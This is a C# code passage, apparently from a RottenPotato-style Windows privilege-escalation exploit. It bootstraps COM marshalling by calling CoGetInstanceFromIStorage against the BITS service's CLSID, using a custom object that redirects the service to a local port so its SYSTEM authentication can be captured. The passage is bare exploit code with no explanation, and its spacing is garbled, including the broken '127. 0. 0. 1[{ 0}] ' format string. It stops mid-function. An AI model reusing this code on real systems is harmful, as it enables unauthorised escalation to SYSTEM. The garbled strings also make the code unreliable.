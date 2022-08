public static void BootstrapComMarshal ( int port )

{

IStorage stg = ComUtils . CreateStorage () ;

// Use a known local system service COM server, in this cast BITSv1

Guid clsid = new Guid ( "4991d34b-80a1-4291-83b6-3328366b9097" ) ;

TestClass c = new TestClass ( stg , String . Format ( "127. 0. 0. 1[{ 0}] " , port )) ;

MULTI_QI [ ] qis = new MULTI_QI [ 1 ] ;

qis [ 0 ] . pIID = ComUtils . IID_IUnknownPtr ;

qis [ 0 ] . pItf = null ;

qis [ 0 ] . hr = 0 ;

CoGetInstanceFromIStorage ( null , ref clsid ,

null , CLSCTX . CLSCTX_LOCAL_SERVER , c , 1 , qis ) ;